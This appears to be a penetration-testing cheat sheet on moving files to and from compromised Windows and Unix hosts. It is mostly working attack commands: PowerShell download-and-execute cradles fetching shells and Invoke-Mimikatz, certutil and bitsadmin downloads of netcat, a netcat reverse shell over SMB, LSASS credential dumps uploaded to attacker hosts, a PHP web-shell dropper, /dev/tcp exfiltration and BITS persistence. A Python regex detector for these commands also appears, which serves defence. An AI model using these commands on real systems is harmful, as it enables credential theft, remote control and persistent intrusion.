# File Transfer

## **Basic commands**

```
python -m SimpleHTTPServer 80
php -S 0.0.0.0:80

powershell.exe -c (new-object System.Net.WebClient).DownloadFile('http://10.10.14.17/nc.exe','c:\temp\nc.exe')
powershell.exe -c (Start-BitsTransfer -Source "http://10.10.14.17/nc.exe" -Destination "C:\temp\nc.exe")
powershell.exe wget "http://10.10.14.17/nc.exe" -outfile "c:\temp\nc.exe"
certutil.exe -urlcache -split -f "http://10.10.14.17/nc.exe" c:\temp\nc.exe
bitsadmin /transfer job /download /priority high http://10.10.14.17/nc.exe c:\temp\nc.exe
powershell -c "Invoke-WebRequest -Uri http://10.10.15.150/41020.exe -OutFile C:\Users\kostas\Desktop\41020.exe"
powershell Invoke-WebRequest http://10.10.14.10/nc.exe -OutFile nc.exe
powershell.exe IEX(New-Object System.Net.WebClient).DownloadString('http://ip/script.ps1')
powershell -exec bypass -command "IEX (New-Object System.Net.WebClient).DownloadString('http://$PENTEST_BOX_IP/Invoke-Mimikatz.ps1');Invoke-Mimikatz"
```

### execute ps1 files

```
powershell.exe -ExecutionPolicy Bypass -NoLogo -NonInteractive -NoProfile -File jaws.ps1
powershell.exe -ExecutionPolicy Bypass -File jaws.ps1
```

### load it into memory

```
IEX(New-Object Net.WebClient).downloadString('http://10.10.15.189:9999/jaws-enum.ps1')
powershell iex(new-object net.webclient).downloadstring(\"http://10.10.14.14/shell.ps1\")
powershell IEX(New-Object Net.WebClient).downloadstring(\"http://10.10.14.14/shell.ps1\")
```

### ninja1

```
echo $webclient = New-Object System.Net.WebClient >>wget.ps1
echo $url = "http://10.10.15.189:9999/jaws-enum.ps1" >>wget.ps1
echo $file = "jaws.ps1" >>wget.ps1
echo $webclient.DownloadFile($url,$file) >>wget.ps1
```

### SMB

```
python3 /usr/share/doc/python3-impacket/examples/smbserver.py a . -smb2support
net view \\10.10.14.17
copy \\10.10.14.17\a\nc.exe .
copy nc2.exe \\10.10.14.17\a\nc2.exe
```

### SMB with password + lsass dump

```
python3 /usr/share/doc/python3-impacket/examples/smbserver.py a . -smb2support -debug -comment "use it" -username admin -password 123 -ts
C:\>net use s: \\10.201.69.16\a /user:admin 123
S:\>procdump.exe -ma lsass.exe c:\TEMP\a.txt
copy c:\TEMP\a.txt.dmp s:
```

### Execute nc via SMB (bypass defenses)

```
\\10.10.14.17\SHARE\nc.exe -nv 10.10.14.17 4444 -e cmd.exe
```

### netcat

```
ncat -lvp 80 > nc2.exe
nc -nv 10.10.14.17 80 < nc.exe -w 15
```

### copy files from target to kali

```
.\rundll32.exe C:\windows\System32\comsvcs.dll, MiniDump 608 C:\temp\lsass.dmp full
powershell -nop -w 1 -sta (New-Object System.Net.WebClient).UploadFile(\"http://10.9.4.210:9999/\", \"lsass.dmp\")
powershell -nop -w 1 -sta (New-Object System.Net.WebClient).UploadFile('http://10.92.137.181:8888', 'zzzzzz.txt.dmp')

nc -lvp 9999 > lsasss.dmp
```

### with PHP

```
echo "<?php file_put_contents('nameOfFile', fopen('http://192.168.1.102/file', 'r')); ?>" > down2.php
```

### HTTP-POST

```
http-post.py
./curl -F 'file=@firefox.exe_190824_231811.dmp' 10.10.15.213:8000/ -v
```

### /dev/tcp

```
cat xxx.zip > /dev/tcp/10.x.x.x/9001
nc -lvp 9001 > xxx.zip
```

### fetch (OpenBSD)

```
fetch http://10.11.0.244/exploit.c
<?php system("fetch -o /usr/local/databases/shell.php http://10.11.0.244/shell.php; php /usr/local/databases/shell.php"); ?>
```

### rdesktop or remmina

```
rdesktop -r disk:tmp=/home/user/Desktop <remote ip address>
```

## BITS

Download a file into the `C:\Windows` folder.

```
> bitsadmin /create download
> bitsadmin /addfile download https://<site>/malware.exe c:\windows\malware.exe
> bitsadmin /resume download
> bitsadmin /complete download

Created job {EA8603EB-7CC2-44EC-B1EE-E9923290C2ED}.
Added https://<site>/malware.exe -> c:\windows\malware.exe to job.
Job resumed.
Job completed.
```

Create persistence.

```
> bitsadmin /create persistence
> bitsadmin /addfile persistence http://127.0.0.1/invalid.exe c:\windows\i.exe
> bitsadmin /SetNotifyCmdLine persistence c:\windows\malware.exe NULL
> bitsadmin /resume persistence
```

<https://www.fireeye.com/blog/threat-research/2021/03/attacker-use-of-windows-background-intelligent-transfer-service.html>
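
One way a defender could flag the BITS commands above in process-creation logs, as an added example that is not part of the original cheat sheet; it goes beyond BITS to cover the other transfer commands listed on this page. The rule names, the `match_rules` and `triage` helpers and the sample lines are constructed for illustration.

```python
import re

# Added example: rule name -> regex over one process command line.
# Each pattern corresponds to a transfer command listed on this page.
RULES = {
    "bits_notify_cmd": r"\bbitsadmin(\.exe)?\b.*\s/setnotifycmdline\b",
    "bits_download": r"\bbitsadmin(\.exe)?\b.*\s/(transfer|addfile)\b.*https?://",
    "bits_loopback_source": r"\bbitsadmin(\.exe)?\b.*\s/addfile\b.*https?://(127\.0\.0\.1|localhost)\b",
    "bits_powershell": r"\bstart-bitstransfer\b",
    "certutil_urlcache": r"\bcertutil(\.exe)?\b.*[-/]urlcache\b.*https?://",
    "ps_webclient": r"\bnet\.webclient\b.*\.(downloadfile|downloadstring|uploadfile)\b",
    "ps_web_request": r"\b(invoke-webrequest|iwr|wget|curl)\b.*https?://.*-outfile\b",
    "unc_exec": r"^\s*\\\\[\w.-]+\\[^\\\s]+\\\S+\.exe\b",
    "comsvcs_minidump": r"\brundll32(\.exe)?\b.*comsvcs\.dll\W+minidump\b",
}
COMPILED = {name: re.compile(rx, re.IGNORECASE) for name, rx in RULES.items()}

def match_rules(cmdline):
    """Return the sorted names of every rule the command line triggers."""
    return sorted(n for n, rx in COMPILED.items() if rx.search(cmdline))

def triage(cmdlines):
    """Return (index, cmdline, rules) for each line that triggers a rule."""
    return [(i, c, r) for i, c in enumerate(cmdlines) if (r := match_rules(c))]

# Constructed sample of CommandLine values as found in process-creation
# events (Security 4688 / Sysmon Event ID 1); not real telemetry.
SAMPLE = [
    r"bitsadmin /addfile persistence http://127.0.0.1/invalid.exe c:\windows\i.exe",
    r"bitsadmin /SetNotifyCmdLine persistence c:\windows\malware.exe NULL",
    r'certutil.exe -urlcache -split -f "http://10.10.14.17/nc.exe" c:\temp\nc.exe',
    r"powershell.exe IEX(New-Object System.Net.WebClient).DownloadString('http://ip/script.ps1')",
    r"\\10.10.14.17\SHARE\nc.exe -nv 10.10.14.17 4444 -e cmd.exe",
    r"bitsadmin /list /allusers /verbose",        # benign: job enumeration only
    r"certutil -hashfile C:\temp\nc.exe SHA256",  # benign: hashing a local file
]

if __name__ == "__main__":
    for idx, cmd, rules in triage(SAMPLE):
        print(f"[{idx}] {', '.join(rules)} :: {cmd}")
```

A BITS job that pairs a loopback source with a notify command line, as in the persistence block above, is the combination worth alerting on first; the single-rule hits are better treated as hunting leads.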

## [**updog**](https://github.com/sc0tfree/updog)

Updog is a replacement for Python's SimpleHTTPServer. It allows uploading and downloading via HTTP/S, can set ad hoc SSL certificates, and supports HTTP basic auth.

or simply:

```
python -m SimpleHTTPServer 8080
```

or HTTPS with upload :sunglasses:

<https://github.com/rhmoult/SecurityTools/blob/master/Platform_Independent/Python/httpsWithUpload/src/httpsWithUpload.py>

## References

* <https://isroot.nl/2018/07/09/post-exploitation-file-transfers-on-windows-the-manual-way/>
* <https://www.netspi.com/blog/technical/network-penetration-testing/15-ways-to-download-a-file/>
* <https://blog.ropnop.com/transferring-files-from-kali-to-windows/>


